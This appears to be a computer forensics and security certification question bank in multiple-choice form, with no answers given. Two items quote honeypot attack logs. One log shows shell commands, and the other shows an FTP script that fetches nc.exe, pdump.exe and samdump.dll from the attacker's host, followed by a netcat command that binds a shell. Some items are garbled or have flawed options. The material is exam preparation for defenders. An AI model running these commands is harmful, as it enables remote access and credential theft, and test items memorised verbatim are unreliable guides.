
Which part of the Windows Registry contains the user's password file?

HKEY_LOCAL_MACHINE
HKEY_CURRENT_CONFIGURATION
HKEY_USER
HKEY_CURRENT_USER

In what way do the procedures for dealing with evidence in a criminal case differ from the
procedures for dealing with evidence in a civil case?
evidence in a civil case must be secured more tightly than in a criminal case
evidence in a criminal case must be secured more tightly than in a civil case
evidence procedures are not important unless you work for a law enforcement agency
evidence must be handled in the same way regardless of the type of case

Which of the following is a benefit of removing unused or unneeded services and protocols?
Less need for administration
More machine resource availability
More Security
More network throughput

The act of attempting to appear to be someone you’re not in order to gain access to a system
is known as which of the following?
Sniffing
Spoofing
Replay
DDoS

The MD5 program is used to:

view graphics files on an evidence drive
wipe magnetic media before recycling it
make directories on an evidence disk
verify that a disk is not altered when you examine it

To allow its employees remote access to the corporate network, a company has implemented
a hardware VPN solution. Why is this considered a secure remote access solution?
Because VPNs use the internet to transfer data
Because only the company's employees will know the address to connect to in order to use
the VPN
Because a VPN uses encryption to make its data secure
Because a VPN uses compression to make its data secure

Josh has asked for a clarification of what a firmware update is. How could you briefly
describe for him the purpose of firmware updates? (Pick the best answer)
Firmware updates update the mechanical function of the device
Firmware updates are minor fixes, and are not usually necessary
Firmware updates are device-specific command sets that must be upgraded to continue
operation
Firmware updates are control software- or BIOS-type updates that are installed to improve
the functionality or extend the life of the device involved

The use of VPNs and _______ has enabled users to telecommute
PGP
Wireless NICs
S/MIME
RASs

When obtaining a warrant it is important to:

generally describe the place to be searched and particularly describe the items to be seized
generally describe the place to be searched and generally describe the items to be seized
particularly describe the place to be searched and generally describe the items to be seized
particularly describe the place to be searched and particularly describe the items to be seized

There are three recognized levels of hacking ability in the internet community. The first is the
skilled hacker, who writes the programs and scripts that script kiddies use for their attacks.
Next comes the script kiddie, who knows how to run the scripts written by the skilled
hackers. After the script kiddies come the _______, who lack the basic knowledge of
networks and security to launch an attack themselves.
Dunce kiddies
Web kiddies
Clickers
Click kiddies

Which is the most important reason for the removal of unused, unnecessary, or unneeded
protocols, services, and applications?
Less machine resource use
Increased performance
Less need for administration
Increased security

If a suspect computer is located in an area that may have toxic chemicals, you must:
determine a way to obtain the suspect computer
coordinate with the HAZMAT team
assume the suspect machine is contaminated
do not enter alone

What happens when a file is deleted by a Microsoft operating system using the FAT file
system?
the file is erased and cannot be recovered
the file is erased but can be recovered
a copy of the file is stored and the original file is erased
only the reference to the file is removed from the FAT

In a computer forensics investigation, what describes the route that evidence takes from the
time you find it until the case is closed or goes to court?
chain of custody
policy of separation
rules of evidence
law of probability

When you use Java, the JVM isolates the Java applet to a sandbox when it executes. What
does this do to provide additional security?
This prevents the Java applet from communicating with servers other than the one from which
it was downloaded
This prevents the Java applet from failing in such a way that the Java applet is unable to
execute
This prevents the Java applet from failing in such a way that it affects another application
This prevents the Java applet from accessing data on the client's hard drive

A honey pot deployed with the IP 172.16.1.108 was compromised by an attacker. Given
below is an excerpt from a Snort binary capture of the attack. Decipher the activity carried
out by the attacker by studying the log. Please note that you are required to infer only what is
explicit in the excerpt. (Note: The student is being tested on concepts learnt during passive
OS fingerprinting, basic TCP/IP connection concepts and the ability to read packet signatures
from a sniff dump.)
03/15-20:21:24.107053 211.185.125.124:3500 -> 172.16.1.108:111
TCP TTL:43 TOS:0x0 ID:29726 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x9B6338C5 Ack: 0x5820ADD0 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23678634 2878772
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.452051 211.185.125.124:789 -> 172.16.1.103:111
UDP TTL:43 TOS:0x0 ID:29733 IpLen:20 DgmLen:84
Len: 64
01 0A 8A 0A 00 00 00 00 00 00 00 02 00 01 86 A0 ................
00 00 00 02 00 00 00 03 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 01 86 B8 00 00 00 01 ................
00 00 00 11 00 00 00 00 ........
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
03/15-20:21:24.730436 211.185.125.124:790 -> 172.16.1.103:32773
UDP TTL:43 TOS:0x0 ID:29781 IpLen:20 DgmLen:1104
Len: 1084
47 F7 9F 63 00 00 00 00 00 00 00 02 00 01 86 B8 G..c............
00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ...............
3A B1 5E E5 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :.^.....localhost
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
03/15-20:21:36.539731 211.185.125.124:4450 -> 172.16.1.108:39168
TCP TTL:43 TOS:0x0 ID:31660 IpLen:20 DgmLen:71 DF
***AP*** Seq: 0x9C6D2BFF Ack: 0x59606333 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 23679878 2880015
63 64 20 2F 3B 20 75 6E 61 6D 65 20 2D 61 3B 20 cd /; uname -a;
69 64 3B id;
The attacker has used a Trojan on port 32773
The attacker has scanned and exploited the system using Buffer
The attacker has conducted a network sweep on port 111

When monitoring for both intrusion and security events between multiple computers, it is
essential that the computers' clocks are synchronized. Synchronized time allows an
administrator to reconstruct what took place during an attack against multiple computers.
Without synchronized time, it is very difficult to determine exactly when specific events took
place, and how events interlace. What is the name of the service used to synchronize time
among multiple computers?
Universal Time Set
Network Time Protocol
SyncTime Service
Time-Sync Protocol

An e-mail log does not contain which of the following information to help you in your
investigation?
(Select up to 4)
e-mail message (the log does not contain attachment data)
user account that was used to send the account
contents of the e-mail message
unique message identifier

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort
reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization
vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not
normally have the right to run scripts. The attacker tries a Unicode attack and eventually
succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The
RDS vulnerability allows a malicious user to construct SQL statements that will execute shell
commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the
directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker
makes an RDS query which results in the commands run as shown below.
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
The attack is a remote exploit and the hacker downloads three files
The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
There are two attackers on the system - johna2k and haxedj00
It is a local exploit where the attacker logs in using username johna2k

When investigating a potential e-mail crime, what is your first step in the investigation?
Determine whether a crime was actually committed
Trace the IP address to its origin
Recover the evidence
Write a report

You are contracted to work as a computer forensics investigator for a regional bank that has
four 30 TB storage area networks that store customer data. What method would be most
efficient for you to acquire digital evidence from this network?
make a bit-stream disk-to-disk file
create a compressed copy of the file with DoubleSpace
create a sparse data copy of a folder or file
make a bit-stream disk-to-image file

You are assigned to work in the computer forensics lab of a state police agency. While
working on a high profile criminal case, you have followed every applicable procedure;
however, your boss is still concerned that the defense attorney might question whether
evidence has been changed while at the lab. What can you do to prove that the evidence is the
same as it was when it first entered the lab?
sign a statement attesting that the evidence is the same as it was when it entered the lab
make an MD5 hash of the evidence and compare it with the original MD5 hash that was
taken when the evidence first entered the lab
make an MD5 hash of the evidence and compare it to the standard database developed by
NIST
there is no reason to worry about this possible claim because state labs are certified

You are setting up a test plan for verifying that new code being placed on a Web server is
secure and does not cause any problems with the production Web server. What is the best
way to test the code prior to deploying it to the production Web server?
Test all new code on a duplicate web server prior to transferring it to the production web
server
Test all new code on an active internal Web server prior to transferring it to the production
web server
Test all new code on another user's PC prior to transferring it to the production web server
Test all new code on a development PC prior to transferring it to the production Web server

Which of the following is the best way to protect your organization from revealing sensitive
information through dumpster diving?
Shred all sensitive documentation
Establish a policy requiring employees to change passwords every 30 to 60 days
Teach employees the value of not disclosing restricted information over the telephone to
unknown parties
Add a new firewall to the network

The network team at your company has placed a sniffer on the network to analyze an ongoing
network-related problem. The team connects to the sniffer using Telnet to view the data
going across the network. What would you recommend to increase the security of this
connection without making it significantly more difficult for the network team members to do
their jobs?
Use SSH to make the connection to the sniffer rather than Telnet
Require the network team to view the data from the local console of the sniffer
Encrypt the connection to the sniffer using PAP
Require the network team to remove the sniffer immediately

The component of a DDoS attack that sends commands to DDoS zombie agents is known as
a _____.
Master
Console
System Commander
Rootkit

You are working as an investigator for a corporation and you have just received instructions
from your manager to assist in the collection of 15 hard drives that are part of an ongoing
investigation.
Your job is to complete the required evidence custody forms to properly document each piece
of evidence as it is collected by other members of your team. Your manager instructs you to
complete one multi-evidence form for the entire case and a single-evidence form for each
hard drive. How will these forms be stored to help preserve the chain of custody of the case?
The multi-evidence form should be placed in an approved secure container with the hard
drives and the single-evidence forms should be placed in the report file.
All forms should be placed in an approved secure container because they are now primary
evidence in the case.
The multi-evidence form should be placed in the report file and the single-evidence forms
should be kept with each hard drive in an approved secure container.
All forms should be placed in the report file because they are now primary evidence in the
case.

An employee is attempting to wipe out data stored on a couple of compact discs (CDs) and
digital video discs (DVDs) by using a large magnet. You inform him that this method will not
be effective in wiping out the data because CDs and DVDs are______________ media used
to store large amounts of data and are not affected by the magnet.
anti-magnetic
magnetic
optical
logical

What file structure database would you expect to find on floppy disks?
NTFS
FAT 12
FAT 32
FAT 16

Before you are called to testify as an expert, what must an attorney do first?
read your curriculum vitae to the jury
engage in damage control
qualify you as an expert witness
prove that the tools you used to conduct your examination are perfect

When examining a file with a Hex Editor, what space does the file header occupy?
the first several bytes of the file
none, file headers are contained in the FAT
the last several bytes of the file
one byte at the beginning of the file

It has been discovered that a former member of the IT department who switched to the
development team still has administrative access to many major network infrastructure
devices and servers. Which of the following mitigation techniques should be implemented to
help reduce the risk of this event recurring?
Incident management and response policy
Change management notifications
DLP
Regular user permission and rights reviews

Sally has come to you for advice and guidance. She is trying to configure a network device to
block attempts to connect on certain ports, but when she finishes the configuration, it works
for a period of time but then changes back to the original configuration. She cannot
understand why the settings continue to change back. When you examine the configuration,
you find that the _______ are incorrect, and are allowing Bob to change the configuration,
although he is not supposed to operate or configure this device. Since he did not know about
Sally, he kept changing the configuration back.
DAC settings
ACL settings
Permissions
MAC settings

What does the acronym POST mean as it relates to a PC?

Primary Operations Short Test
Pre Operational Situation Test
Power On Self Test
Primary Operating System Test

What binary coding is used most often for e-mail purposes?

Uuencode
MIME
SMTP
IMAP

Corporate investigations are typically easier than public investigations because ...
the users have standard corporate equipment and software
the users can load whatever they want on their machines
the investigator does not have to get a warrant
the investigator has to get a warrant

If you plan to start up a suspect's computer, you must modify the ___________ to ensure that
you do not contaminate or alter data on the suspect's hard drive by booting to the hard drive.
Boot sys
deltree command
CMOS
Scandisk utility

Lance wants to place a honeypot on his network. Which of the following would be your
recommendations?
Use a system that is not directly interacting with the router
Use a system that has a dynamic addressing on the network
Use it on a system in an external DMZ in front of the firewall
It doesn't matter as all replies are faked

It takes _____________ mismanaged case/s to ruin your professional reputation as a computer
forensics examiner?
quite a few
by law, three
only one
at least two

Which of the following is a weakness in WEP related to the IV? (Select all that apply)
The IV is a static value, which makes it relatively easy for an attacker to brute force the WEP
key from captured traffic
The IV is transmitted in plaintext and can be easily seen in captured traffic
The IV is only 24 bits in size, which makes it possible that two or more data frames will be
transmitted with the same IV, thereby resulting in an IV collision that an attacker can use to
determine information about the network
There is no weakness in WEP related to the IV

During the course of an investigation, you locate evidence that may prove the innocence of
the suspect of the investigation. You must maintain an unbiased opinion and be objective in
your entire fact finding process. Therefore you report this evidence. This type of evidence is
known as:
Inculpatory evidence
mandatory evidence
exculpatory evidence
Terrible evidence

When an investigator contacts by telephone the domain administrator or controller listed by a
whois lookup to request all e-mails sent and received for a user account be preserved, what
U.S.C. statute authorizes this phone call and obligates the ISP to preserve e-mail records?
Title 18, Section 2703(f)
Title 18, Section Chapter 90
Title 18, Section 2703(d)
Title 18, Section 1030

You are creating a DMZ for a company and need to allow external users to access Web servers
in the DMZ using HTTP/S as well as allow internal users to access the same Web firewalls to
meet these requirements
Open port 80 on the external firewall and port 110 on the internal firewall
Open port 443 on the external firewall and port 80 on the internal firewall
Open port 80 on the external firewall and port 443 on the internal firewall
Open port 110 on the external firewall and port 80 on the internal firewall

Which of the following protocols can be used to secure a VPN connection?

DNS
AppleTalk
MPPE
TCP/IP

What term is used to describe a cryptographic technique for embedding information into
something else for the sole purpose of hiding that information from the casual observer?
steganography
rootkit
Offset
key escrow

To calculate the number of bytes on a disk, the formula is: CHS**

number of circles x number of halves x number of sides x 512 bytes per sector
number of cylinders x number of halves x number of shims x 512 bytes per sector
number of cells x number of heads x number of sides x 512 bytes per sector
The answers are wrong

Which of the following is most likely to make systems vulnerable to MITM attacks?

Weak passwords
Weak TCP sequence number
Use of the wrong operating system
Authentication misconfiguration on routers

PDAs, cell phones, and certain network cards have the ability to use _______ networks.
Choose the BEST answer
Wireless
Wired
Antique
Private

A suspect is accused of violating the acceptable use of computing resources, as he has visited
adult websites and downloaded images. The investigator wants to demonstrate that the
suspect did indeed visit these sites. However, the suspect has cleared the search history and
emptied the cookie cache. Moreover, he has removed any images he might have downloaded.
What can the investigator do to prove the violation? Choose the most feasible option.
Approach the websites for evidence
Image the disk and try to recover deleted files
Seek the help of co-workers who are eye-witnesses
Check the Windows registry for connection data (You may or may not recover)